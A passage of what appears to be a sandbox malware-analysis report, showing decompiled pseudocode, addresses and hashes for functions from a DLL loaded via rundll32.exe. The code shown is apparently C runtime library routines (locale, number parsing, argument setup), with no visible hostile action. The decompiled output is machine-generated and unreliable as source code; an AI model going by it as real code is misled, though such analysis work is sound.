											_t101 = E1002A35B( &_v180);
											__eflags = _t101;
											if(_t101 == 0) {
												goto L67;
											} else {
												_t102 = _v212;
												__eflags = _t102;
												if(_t102 == 0) {
													_t104 = E1002602C(_t164,  &_v180);
													goto L55;
												} else {
													_t182 = _t102 & 0x0000ffff;
													__eflags = _t182 - 0x41 - 0x19;
													if(_t182 - 0x41 <= 0x19) {
														_t182 = _t182 + 0x20;
														__eflags = _t182;
													}
													_t191 = 0x38;
													__eflags = _t182 - 0x75;
													if(_t182 != 0x75) {
														L50:
														__eflags = _v206 - 0x2d;
														if(_v206 != 0x2d) {
															goto L67;
														} else {
															__eflags = _v204 - _t191;
															if(_v204 != _t191) {
																goto L67;
															} else {
																__eflags = _v202;
																if(_v202 != 0) {
																	goto L67;
																} else {
																	goto L53;
																}
															}
														}
													} else {
														_t183 = _v210 & 0x0000ffff;
														__eflags = _t183 - 0x41 - 0x19;
														if(_t183 - 0x41 <= 0x19) {
															_t183 = _t183 + 0x20;
															__eflags = _t183;
														}
														__eflags = _t183 - 0x74;
														if(_t183 != 0x74) {
															goto L50;
														} else {
															_t184 = _v208 & 0x0000ffff;
															__eflags = _t184 - 0x41 - 0x19;
															if(_t184 - 0x41 <= 0x19) {
																_t184 = _t184 + 0x20;
																__eflags = _t184;
															}
															__eflags = _t184 - 0x66;
															if(_t184 != 0x66) {
																goto L50;
															} else {
																__eflags = _v206 - _t191;
																if(_v206 != _t191) {
																	goto L50;
																} else {
																	__eflags = _v204;
																	if(_v204 == 0) {
																		L53:
																		_t104 = 0xfde9;
																		L55:
																		_t196 = _t195 + 1;
																		_push(_t196);
																		 *_t153 = _t104 & 0x0000ffff;
																		_t149 = _v476;
																		_t106 = E1002FBCB(_t149, 0x83, _t197);
																		_t200 = _t200 + 0x10;
																		__eflags = _t106;
																		if(_t106 != 0) {
																			goto L71;
																		} else {
																			_t176 =  &_v180;
																			_t191 = _t176 + 2;
																			do {
																				_t119 =  *_t176;
																				_t176 = _t176 + 2;
																				__eflags = _t119 - _v484;
																			} while (_t119 != _v484);
																			_t177 = _t176 - _t191;
																			__eflags = _t177;
																			_push((_t177 >> 1) + 1);
																			_push( &_v180);
																			goto L59;
																		}
																	} else {
																		goto L50;
																	}
																}
															}
														}
													}
												}
											}
										}
									} else {
										_t133 = E1002602C(_t162);
										_t196 = _t195 + 1;
										_push(_t196);
										 *_t153 = _t133 & 0x0000ffff;
										_t149 = _v476;
										_t135 = E1002FBCB(_t149, 0x83, _t197);
										_t200 = _t200 + 0x14;
										__eflags = _t135;
										if(_t135 != 0) {
											goto L71;
										} else {
											_push(_t196);
											_push(_t197);
											L59:
											E10024C94( &_v512, _t197);
											goto L60;
										}
									}
								} else {
									_t149 = _v476;
									_push( &_v468);
									E10024E33(_t149, _t162, _t191, _t195, _t149, 0x83);
									_t185 =  &_v180;
									_t200 = _t200 + 0xc;
									_t191 = _t185 + 2;
									do {
										_t140 =  *_t185;
										_t185 = _t185 + 2;
										__eflags = _t140 - _v484;
									} while (_t140 != _v484);
									E10024CD8( &_v512, _t197,  &_v180, (_t185 - _t191 >> 1) + 1);
									_t196 = _t195 + 1;
									L60:
									__eflags =  *_t197;
									if( *_t197 == 0) {
										L64:
										__eflags = 0;
										 *_v480 = 0;
										goto L65;
									} else {
										__eflags = _v492 - 0x83;
										if(_v492 >= 0x83) {
											goto L64;
										} else {
											_push(_t196);
											_t129 = E1002FBCB(_v480, 0x83, _t197);
											_t200 = _t200 + 0x10;
											__eflags = _t129;
											if(_t129 == 0) {
												goto L65;
											} else {
												goto L71;
											}
										}
									}
								}
							}
						} else {
							_t189 = _t197;
							_t144 = _t150;
							while(1) {
								_t191 =  *_t144;
								__eflags = _t191 -  *_t189;
								if(_t191 !=  *_t189) {
									break;
								}
								__eflags = _t191;
								if(_t191 == 0) {
									L13:
									_t145 = 0;
								} else {
									_t191 =  *((intOrPtr*)(_t144 + 2));
									__eflags = _t191 - _t189[0];
									if(_t191 != _t189[0]) {
										break;
									} else {
										_t144 = _t144 + 4;
										_t189 =  &(_t189[1]);
										__eflags = _t191;
										if(_t191 != 0) {
											continue;
										} else {
											goto L13;
										}
									}
								}
								L15:
								__eflags = _t145;
								if(_t145 == 0) {
									L65:
									 *_v488 =  *_v472;
									_t127 = E10028A30(_v496, _a12, _t149);
									__eflags = _t127;
									if(_t127 != 0) {
										goto L71;
									} else {
										L68:
										E10024A36( &_v512);
										goto L69;
									}
								} else {
									_t146 = _v480;
									_t160 = _t197;
									while(1) {
										_t191 =  *_t146;
										__eflags = _t191 -  *_t160;
										if(_t191 !=  *_t160) {
											break;
										}
										__eflags = _t191;
										if(_t191 == 0) {
											L21:
											_t147 = 0;
										} else {
											_t191 =  *((intOrPtr*)(_t146 + 2));
											__eflags = _t191 - _t160[0];
											if(_t191 != _t160[0]) {
												break;
											} else {
												_t146 = _t146 + 4;
												_t160 =  &(_t160[1]);
												__eflags = _t191;
												if(_t191 != 0) {
													continue;
												} else {
													goto L21;
												}
											}
										}
										L23:
										__eflags = _t147;
										if(_t147 == 0) {
											goto L65;
										} else {
											goto L24;
										}
										goto L84;
									}
									asm("sbb eax, eax");
									_t147 = _t146 | 0x00000001;
									__eflags = _t147;
									goto L23;
								}
								goto L84;
							}
							asm("sbb eax, eax");
							_t145 = _t144 | 0x00000001;
							__eflags = _t145;
							goto L15;
						}
					} else {
						_t148 = E10028A30(_t149, _a12, 0x10044e50);
						if(_t148 != 0) {
							L71:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E1000E341();
							asm("int3");
							_push(8);
							_push(0x1004b2f8);
							_t109 = E100040F0();
							_t198 = _a4;
							__eflags = _t198;
							if(_t198 != 0) {
								_t110 = E1002651E(5);
								_v8 = _v8 & 0x00000000;
								__eflags =  *(_t198 + 4);
								if( *(_t198 + 4) != 0) {
									__eflags = _t110 | 0xffffffff;
									asm("lock xadd [ecx], eax");
									if((_t110 | 0xffffffff) == 0) {
										__eflags =  *(_t198 + 4) - 0x1004d180;
										if( *(_t198 + 4) != 0x1004d180) {
											E100268B3( *(_t198 + 4));
										}
									}
								}
								_v8 = 0xfffffffe;
								E1002555B();
								__eflags =  *_t198;
								if( *_t198 != 0) {
									E1002651E(4);
									_v8 = 1;
									E1002E33E( *_t198);
									_t114 =  *_t198;
									__eflags = _t114;
									if(_t114 != 0) {
										__eflags =  *(_t114 + 0xc);
										if( *(_t114 + 0xc) == 0) {
											__eflags = _t114 - 0x1004d0b8;
											if(_t114 != 0x1004d0b8) {
												E1002E173(_t114);
											}
										}
									}
									_v8 = 0xfffffffe;
									E10025567();
								}
								_t109 = E100268B3(_t198);
							}
							 *[fs:0x0] = _v20;
							return _t109;
						} else {
							 *_v488 = _t148;
							L69:
							_t86 = _t149;
							goto L70;
						}
					}
				}
				L84:
			}

0x100250e8
0x100250f3
0x100250fa
0x10025101
0x10025105
0x10025108
0x1002510e
0x10025110
0x10025117
0x1002511c
0x10025492
0x100254a0
0x10025122
0x10025126
0x1002512c
0x1002515f
0x10025166
0x10025169
0x1002516f
0x1002516f
0x10025175
0x10025178
0x1002517e
0x1002518b
0x10025190
0x10025192
0x10025192
0x10025194
0x10025197
0x10025197
0x1002519a
0x1002519d
0x1002519d
0x100251a4
0x100251a6
0x100251ac
0x100251b2
0x10025226
0x10025226
0x1002522d
0x10025237
0x1002523a
0x10025240
0x10025241
0x10025243
0x100252be
0x00000000
0x10025245
0x10025245
0x1002524b
0x1002524d
0x10025253
0x10025254
0x10025255
0x10025256
0x1002525f
0x10025258
0x10025258
0x10025258
0x10025264
0x10025267
0x10025269
0x100252c4
0x100252c5
0x100252ca
0x100252cb
0x100252cd
0x10025305
0x10025306
0x1002530c
0x1002530d
0x1002530f
0x10025481
0x10025481
0x10025483
0x00000000
0x10025315
0x1002531c
0x10025321
0x10025323
0x00000000
0x10025329
0x10025329
0x10025330
0x10025333
0x100253c7
0x00000000
0x10025339
0x10025339
0x1002533f
0x10025342
0x10025344
0x10025344
0x10025344
0x10025349
0x1002534a
0x1002534d
0x10025390
0x10025390
0x10025398
0x00000000
0x1002539e
0x1002539e
0x100253a5
0x00000000
0x100253ab
0x100253ab
0x100253b3
0x00000000
0x00000000
0x00000000
0x00000000
0x100253b3
0x100253a5
0x1002534f
0x1002534f
0x10025359
0x1002535c
0x1002535e
0x1002535e
0x1002535e
0x10025361
0x10025364
0x00000000
0x10025366
0x10025366
0x10025370
0x10025373
0x10025375
0x10025375
0x10025375
0x10025378
0x1002537b
0x00000000
0x1002537d
0x1002537d
0x10025384
0x00000000
0x10025386
0x10025386
0x1002538e
0x100253b9
0x100253b9
0x100253cd
0x100253cd
0x100253d1
0x100253d3
0x100253d5
0x100253e1
0x100253e6
0x100253e9
0x100253eb
0x00000000
0x100253f1
0x100253f1
0x100253f7
0x100253fa
0x100253fa
0x100253fd
0x10025400
0x10025400
0x10025409
0x10025409
0x10025410
0x10025417
0x00000000
0x10025417
0x00000000
0x00000000
0x00000000
0x1002538e
0x10025384
0x1002537b
0x10025364
0x1002534d
0x10025333
0x10025323
0x100252cf
0x100252cf
0x100252d4
0x100252d8
0x100252da
0x100252dc
0x100252e8
0x100252ed
0x100252f0
0x100252f2
0x00000000
0x100252f8
0x100252f8
0x100252f9
0x10025418
0x1002541e
0x00000000
0x1002541e
0x100252f2
0x1002526b
0x1002526b
0x10025277
0x1002527e
0x10025283
0x10025289
0x1002528c
0x1002528f
0x1002528f
0x10025292
0x10025295
0x10025295
0x100252b3
0x100252b8
0x10025423
0x10025425
0x10025428
0x1002544e
0x10025454
0x10025456
0x00000000
0x1002542a
0x1002542f
0x10025435
0x00000000
0x10025437
0x10025437
0x10025440
0x10025445
0x10025448
0x1002544a
0x00000000
0x1002544c
0x00000000
0x1002544c
0x1002544a
0x10025435
0x10025428
0x10025269
0x100251b4
0x100251b4
0x100251b6
0x100251b8
0x100251b8
0x100251bb
0x100251be
0x00000000
0x00000000
0x100251c0
0x100251c3
0x100251da
0x100251da
0x100251c5
0x100251c5
0x100251c9
0x100251cd
0x00000000
0x100251cf
0x100251cf
0x100251d2
0x100251d5
0x100251d8
0x00000000
0x00000000
0x00000000
0x00000000
0x100251d8
0x100251cd
0x100251e3
0x100251e3
0x100251e5
0x10025459
0x10025471
0x10025473
0x1002547b
0x1002547d
0x00000000
0x1002547f
0x10025485
0x1002548b
0x00000000
0x1002548b
0x100251eb
0x100251eb
0x100251f1
0x100251f3
0x100251f3
0x100251f6
0x100251f9
0x00000000
0x00000000
0x100251fb
0x100251fe
0x10025215
0x10025215
0x10025200
0x10025200
0x10025204
0x10025208
0x00000000
0x1002520a
0x1002520a
0x1002520d
0x10025210
0x10025213
0x00000000
0x00000000
0x00000000
0x00000000
0x10025213
0x10025208
0x1002521e
0x1002521e
0x10025220
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10025220
0x10025219
0x1002521b
0x1002521b
0x00000000
0x1002521b
0x00000000
0x100251e5
0x100251de
0x100251e0
0x100251e0
0x00000000
0x100251e0
0x10025134
0x1002513d
0x10025147
0x100254a1
0x100254a3
0x100254a4
0x100254a5
0x100254a6
0x100254a7
0x100254a8
0x100254ad
0x100254ae
0x100254b0
0x100254b5
0x100254ba
0x100254bd
0x100254bf
0x100254c7
0x100254cd
0x100254d4
0x100254d6
0x100254d8
0x100254db
0x100254df
0x100254e1
0x100254e8
0x100254ed
0x100254f2
0x100254e8
0x100254df
0x100254f3
0x100254fa
0x100254ff
0x10025502
0x10025506
0x1002550c
0x10025515
0x1002551b
0x1002551d
0x1002551f
0x10025521
0x10025525
0x10025527
0x1002552c
0x1002552f
0x10025534
0x1002552c
0x10025525
0x10025535
0x1002553c
0x1002553c
0x10025542
0x10025547
0x1002554b
0x10025557
0x1002514d
0x10025153
0x10025490
0x10025490
0x00000000
0x10025490
0x10025147
0x1002512c
0x00000000

APIs

_free.LIBCMT ref: 100254ED
_free.LIBCMT ref: 10025542

Strings

-, xrefs: 10025390

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID: -
API String ID: 269201875-2547889144
Opcode ID: 182027e96e950bcb7a76d4b4b57f72c40b47ad3f81e16720650cf2bf331a3730
Instruction ID: 66f1abc88b353573048c8297ce13dc3db2c99bd53dfa5fdd719ba2a4e5362786
Opcode Fuzzy Hash: 182027e96e950bcb7a76d4b4b57f72c40b47ad3f81e16720650cf2bf331a3730
Instruction Fuzzy Hash: 16C109759002569BDB20DF64EC51BEEB3F4EF05386F9140AAE80697181EB72AFC4CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1000ED39, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000ED39(intOrPtr _a4, signed int _a8, intOrPtr* _a12, signed int _a16, signed char _a20) {
				signed char _v5;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v60;
				char _v64;
				intOrPtr* _t82;
				signed int _t84;
				signed int _t86;
				signed int _t90;
				signed int _t91;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed char _t100;
				signed int _t102;
				signed int _t103;
				signed char _t114;
				signed int _t116;
				void* _t117;
				intOrPtr* _t119;
				signed int _t128;
				signed char _t129;
				signed char _t131;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				void* _t144;
				signed int _t146;
				intOrPtr* _t147;
				signed int _t149;
				signed int _t150;
				void* _t151;

				if(E1000FB3F( &_a8) == 0) {
					L5:
					_t128 = 0;
					_t150 = 0;
					L6:
					_t82 = _a12;
					if(_t82 != 0) {
						 *_t82 = _a8;
					}
					return _t128;
				}
				_t84 = _a16;
				if(_t84 == 0) {
					L9:
					E1000F794( &_v64, _t144, _a4);
					_t86 = _a8;
					_t149 = 0;
					_v20 = 0;
					_t150 = 0;
					_v48 = _t86;
					L11:
					_t129 =  *_t86;
					_a8 = _t86 + 1;
					_v16 = _t129;
					_v5 = _t129;
					_t90 = E1000FEA3(_t129 & 0x000000ff, 8,  &_v60);
					_t151 = _t151 + 0xc;
					__eflags = _t90;
					if(_t90 != 0) {
						_t86 = _a8;
						goto L11;
					}
					_t91 = _a20 & 0x000000ff;
					_v12 = _t91;
					__eflags = _t129 - 0x2d;
					if(_t129 != 0x2d) {
						__eflags = _t129 - 0x2b;
						if(_t129 != 0x2b) {
							_t146 = _a8;
							goto L17;
						}
						goto L15;
					} else {
						_v12 = _t91 | 0x00000002;
						L15:
						_t147 = _a8;
						_t129 =  *_t147;
						_t146 = _t147 + 1;
						_v5 = _t129;
						_v16 = _t129;
						_a8 = _t146;
						L17:
						_t135 = _a16;
						__eflags = _t135;
						if(_t135 == 0) {
							L19:
							__eflags = _t129 - 0x30 - 9;
							if(_t129 - 0x30 > 9) {
								__eflags = _t129 - 0x61 - 0x19;
								if(_t129 - 0x61 > 0x19) {
									_t97 = _t129 - 0x41;
									__eflags = _t97 - 0x19;
									if(_t97 > 0x19) {
										_t98 = _t97 | 0xffffffff;
										__eflags = _t98;
									} else {
										_t98 = _t129 + 0xffffffc9;
									}
								} else {
									_t98 = _t129 + 0xffffffa9;
								}
							} else {
								_t98 = _t129 + 0xffffffd0;
							}
							__eflags = _t98;
							if(_t98 == 0) {
								_t99 =  *_t146;
								_t146 = _t146 + 1;
								_v28 = _t99;
								_a8 = _t146;
								__eflags = _t99 - 0x78;
								if(_t99 == 0x78) {
									L35:
									__eflags = _t135;
									if(_t135 == 0) {
										_a16 = 0x10;
									}
									_t100 =  *_t146;
									_v5 = _t100;
									_v16 = _t100;
									_a8 = _t146 + 1;
									L34:
									_t102 = _a16;
									L39:
									asm("cdq");
									_push(_t129);
									_t136 = _t146;
									_v44 = _t102;
									_v40 = _t136;
									_t103 = E1003F7B0(0xffffffff, 0xffffffff, _t102, _t136);
									_v32 = _t129;
									_t131 = _v12;
									_v36 = _t136;
									_t137 = _v5;
									_v24 = _t103;
									_v28 = _t146;
									while(1) {
										__eflags = _t137 - 0x30 - 9;
										if(_t137 - 0x30 > 9) {
											__eflags = _t137 - 0x61 - 0x19;
											if(_t137 - 0x61 > 0x19) {
												__eflags = _t137 - 0x41 - 0x19;
												if(_t137 - 0x41 > 0x19) {
													_t138 = _t137 | 0xffffffff;
													__eflags = _t138;
												} else {
													_t138 = _t137 + 0xffffffc9;
												}
											} else {
												_t138 = _t137 + 0xffffffa9;
											}
										} else {
											_t138 = _t137 + 0xffffffd0;
										}
										_v12 = _t138;
										__eflags = _t138 - 0xffffffff;
										if(_t138 == 0xffffffff) {
											break;
										}
										__eflags = _t138 - _a16;
										if(_t138 >= _a16) {
											break;
										}
										_t116 = _v20;
										_t131 = _t131 | 0x00000008;
										__eflags = _t150 - _t146;
										if(__eflags < 0) {
											L58:
											_v12 = _t138;
											L59:
											_t117 = E1003F850(_v44, _v40, _t116, _t150);
											_t150 = _t146;
											_v20 = _t117 + _v12;
											asm("adc esi, edi");
											L60:
											_t119 = _a8;
											_t146 = _v28;
											_t137 =  *_t119;
											_v16 = _t137;
											_a8 = _t119 + 1;
											continue;
										}
										_t146 = _v24;
										if(__eflags > 0) {
											L52:
											__eflags = _t116 - _t146;
											if(_t116 != _t146) {
												L57:
												_t131 = _t131 | 0x00000004;
												goto L60;
											}
											__eflags = _t150 - _v28;
											if(_t150 != _v28) {
												goto L57;
											}
											__eflags = _t149 - _v32;
											if(__eflags < 0) {
												goto L59;
											}
											if(__eflags > 0) {
												goto L57;
											}
											__eflags = _t138 - _v36;
											if(_t138 <= _v36) {
												goto L59;
											}
											goto L57;
										}
										__eflags = _t116 - _t146;
										if(_t116 < _t146) {
											goto L58;
										}
										goto L52;
									}
									_v12 = _t131;
									E1000FAE8( &_a8, _v16);
									__eflags = _t131 & 0x00000008;
									if((_t131 & 0x00000008) != 0) {
										_t128 = _v20;
										__eflags = E1000E497(_v12, _t128, _t150);
										if(__eflags == 0) {
											__eflags = _v12 & 0x00000002;
											if((_v12 & 0x00000002) != 0) {
												_t128 =  ~_t128;
												asm("adc esi, edi");
												_t150 =  ~_t150;
											}
											L72:
											__eflags = _v52;
											if(_v52 != 0) {
												 *(_v64 + 0x350) =  *(_v64 + 0x350) & 0xfffffffd;
											}
											goto L6;
										}
										 *((intOrPtr*)(E1002449E(__eflags))) = 0x22;
										_t114 = _v12;
										__eflags = _t114 & 0x00000001;
										if((_t114 & 0x00000001) != 0) {
											__eflags = _t114 & 0x00000002;
											if((_t114 & 0x00000002) == 0) {
												_t149 = _t149 | 0xffffffff;
												__eflags = _t149;
												_t150 = 0x7fffffff;
											} else {
												_t150 = 0x80000000;
											}
											L69:
											_t128 = _t149;
											goto L72;
										}
										_t128 = _t128 | 0xffffffff;
										_t150 = _t150 | 0xffffffff;
										goto L72;
									}
									_t150 = _t149;
									_a8 = _v48;
									goto L69;
								}
								__eflags = _t99 - 0x58;
								if(_t99 == 0x58) {
									goto L35;
								}
								__eflags = _t135;
								if(_t135 == 0) {
									_a16 = 8;
								}
								E1000FAE8( &_a8, _v28);
								goto L34;
							}
							__eflags = _t135;
							if(_t135 != 0) {
								L38:
								_t102 = _t135;
								goto L39;
							}
							_t102 = 0xa;
							_a16 = _t102;
							goto L39;
						}
						__eflags = _t135 - 0x10;
						if(_t135 != 0x10) {
							goto L38;
						}
						goto L19;
					}
				}
				if(_t84 < 2) {
					L4:
					 *((intOrPtr*)(E1002449E(_t156))) = 0x16;
					E1000E314();
					goto L5;
				}
				_t156 = _t84 - 0x24;
				if(_t84 <= 0x24) {
					goto L9;
				}
				goto L4;
			}

0x1000ed4e
0x1000ed71
0x1000ed73
0x1000ed75
0x1000ed77
0x1000ed77
0x1000ed7c
0x1000ed81
0x1000ed81
0x1000ed8b
0x1000ed8b
0x1000ed50
0x1000ed55
0x1000ed8c
0x1000ed92
0x1000ed97
0x1000ed9a
0x1000ed9c
0x1000ed9f
0x1000eda1
0x1000eda9
0x1000eda9
0x1000edac
0x1000edb9
0x1000edbc
0x1000edbf
0x1000edc4
0x1000edc7
0x1000edc9
0x1000eda6
0x00000000
0x1000eda6
0x1000edcb
0x1000edcf
0x1000edd2
0x1000edd5
0x1000eddf
0x1000ede2
0x1000edf5
0x00000000
0x1000edf5
0x00000000
0x1000edd7
0x1000edda
0x1000ede4
0x1000ede4
0x1000ede7
0x1000ede9
0x1000edea
0x1000eded
0x1000edf0
0x1000edf8
0x1000edf8
0x1000edfb
0x1000edfd
0x1000ee08
0x1000ee0c
0x1000ee0e
0x1000ee1c
0x1000ee1e
0x1000ee2a
0x1000ee2c
0x1000ee2e
0x1000ee38
0x1000ee38
0x1000ee30
0x1000ee33
0x1000ee33
0x1000ee20
0x1000ee23
0x1000ee23
0x1000ee10
0x1000ee13
0x1000ee13
0x1000ee3b
0x1000ee3d
0x1000ee4b
0x1000ee4d
0x1000ee4e
0x1000ee51
0x1000ee54
0x1000ee56
0x1000ee77
0x1000ee77
0x1000ee79
0x1000ee7b
0x1000ee7b
0x1000ee82
0x1000ee84
0x1000ee87
0x1000ee8d
0x1000ee72
0x1000ee72
0x1000ee94
0x1000ee94
0x1000ee95
0x1000ee96
0x1000ee98
0x1000eea1
0x1000eea4
0x1000eea9
0x1000eeae
0x1000eeb1
0x1000eeb4
0x1000eeb7
0x1000eeba
0x1000eebd
0x1000eec1
0x1000eec3
0x1000eed1
0x1000eed3
0x1000eee1
0x1000eee3
0x1000eeed
0x1000eeed
0x1000eee5
0x1000eee8
0x1000eee8
0x1000eed5
0x1000eed8
0x1000eed8
0x1000eec5
0x1000eec8
0x1000eec8
0x1000eef0
0x1000eef3
0x1000eef6
0x00000000
0x00000000
0x1000eef8
0x1000eefb
0x00000000
0x00000000
0x1000eefd
0x1000ef00
0x1000ef03
0x1000ef05
0x1000ef2a
0x1000ef2a
0x1000ef2d
0x1000ef35
0x1000ef3d
0x1000ef3f
0x1000ef42
0x1000ef44
0x1000ef44
0x1000ef47
0x1000ef4a
0x1000ef4d
0x1000ef50
0x00000000
0x1000ef50
0x1000ef07
0x1000ef0a
0x1000ef10
0x1000ef10
0x1000ef12
0x1000ef25
0x1000ef25
0x00000000
0x1000ef25
0x1000ef14
0x1000ef17
0x00000000
0x00000000
0x1000ef19
0x1000ef1c
0x00000000
0x00000000
0x1000ef1e
0x00000000
0x00000000
0x1000ef20
0x1000ef23
0x00000000
0x00000000
0x00000000
0x1000ef23
0x1000ef0c
0x1000ef0e
0x00000000
0x00000000
0x00000000
0x1000ef0e
0x1000ef5e
0x1000ef61
0x1000ef66
0x1000ef69
0x1000ef75
0x1000ef85
0x1000ef87
0x1000efba
0x1000efbe
0x1000efc0
0x1000efc2
0x1000efc4
0x1000efc4
0x1000efc6
0x1000efc6
0x1000efca
0x1000efd3
0x1000efd3
0x00000000
0x1000efca
0x1000ef8e
0x1000ef94
0x1000ef97
0x1000ef99
0x1000efa3
0x1000efa5
0x1000efae
0x1000efae
0x1000efb1
0x1000efa7
0x1000efa7
0x1000efa7
0x1000efb6
0x1000efb6
0x00000000
0x1000efb6
0x1000ef9b
0x1000ef9e
0x00000000
0x1000ef9e
0x1000ef6e
0x1000ef70
0x00000000
0x1000ef70
0x1000ee58
0x1000ee5a
0x00000000
0x00000000
0x1000ee5c
0x1000ee5e
0x1000ee60
0x1000ee60
0x1000ee6d
0x00000000
0x1000ee6d
0x1000ee3f
0x1000ee41
0x1000ee92
0x1000ee92
0x00000000
0x1000ee92
0x1000ee45
0x1000ee46
0x00000000
0x1000ee46
0x1000edff
0x1000ee02
0x00000000
0x00000000
0x00000000
0x1000ee02
0x1000edd5
0x1000ed5a
0x1000ed61
0x1000ed66
0x1000ed6c
0x00000000
0x1000ed6c
0x1000ed5c
0x1000ed5f
0x00000000
0x00000000
0x00000000

APIs

__aulldvrm.LIBCMT ref: 1000EEA4

Strings

+, xrefs: 1000EDDF
-, xrefs: 1000EDD2

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 46df5ecb2115870ebc51702f835dafacfc7ca39e1ce3594c4648c089db74f28f
Instruction ID: 161e414dc9c41f8d3233c1f3fc7934caf211311be282c5be911a7171b8d9abf8
Opcode Fuzzy Hash: 46df5ecb2115870ebc51702f835dafacfc7ca39e1ce3594c4648c089db74f28f
Instruction Fuzzy Hash: 7E91C370D042DE9EEF14CE68C8506EDBBB1EF453E0F14866AE875BB299D3309D418B51

Uniqueness

Uniqueness Score: -1.00%

Function 10010849, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E10010849(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E100282F8(_t48);
						E10027C80(_t57, 0, 0x1004e070, 0x104);
						_t26 =  *0x1004e540; // 0x2d2cb0
						 *0x1004e52c = 0x1004e070;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x1004e070;
							_v20 = 0x1004e070;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E10010F75(E10010AE4( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E10010AE4( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E10027ABF(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x1004e534 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x1004e538 = _t58;
											L18:
											E100268B3(_t37);
											_v12 = 0;
											L19:
											E100268B3(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x1004e534 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x1004e538 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E1002449E(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E1002449E(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E1000E314();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x10010849
0x10010852
0x10010857
0x10010861
0x10010864
0x10010881
0x10010882
0x10010895
0x1001089a
0x100108a2
0x100108a8
0x100108ab
0x100108ad
0x100108b4
0x100108b4
0x100108b6
0x100108b9
0x100108bc
0x100108c3
0x100108dc
0x100108e1
0x100108e3
0x10010904
0x1001090c
0x1001090f
0x1001092a
0x1001092d
0x10010934
0x10010938
0x1001093a
0x10010941
0x10010944
0x10010946
0x10010948
0x1001094a
0x10010954
0x10010954
0x10010956
0x1001095c
0x1001095f
0x10010961
0x10010967
0x10010968
0x1001096e
0x10010971
0x10010972
0x10010978
0x1001097b
0x00000000
0x00000000
0x00000000
0x00000000
0x1001094c
0x1001094c
0x1001094c
0x1001094f
0x10010950
0x10010950
0x00000000
0x1001094c
0x1001093c
0x00000000
0x1001093c
0x10010914
0x10010914
0x10010915
0x1001091a
0x1001091c
0x1001091e
0x10010923
0x10010923
0x00000000
0x10010923
0x100108e5
0x100108ea
0x100108ec
0x100108ed
0x00000000
0x100108ed
0x100108af
0x100108b2
0x00000000
0x00000000
0x00000000
0x100108b2
0x10010866
0x10010869
0x00000000
0x00000000
0x1001086b
0x10010872
0x10010873
0x10010875
0x1001087a
0x00000000
0x1001087a
0x00000000

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 1001088C, 10010893, 100108C9

Memory Dump Source

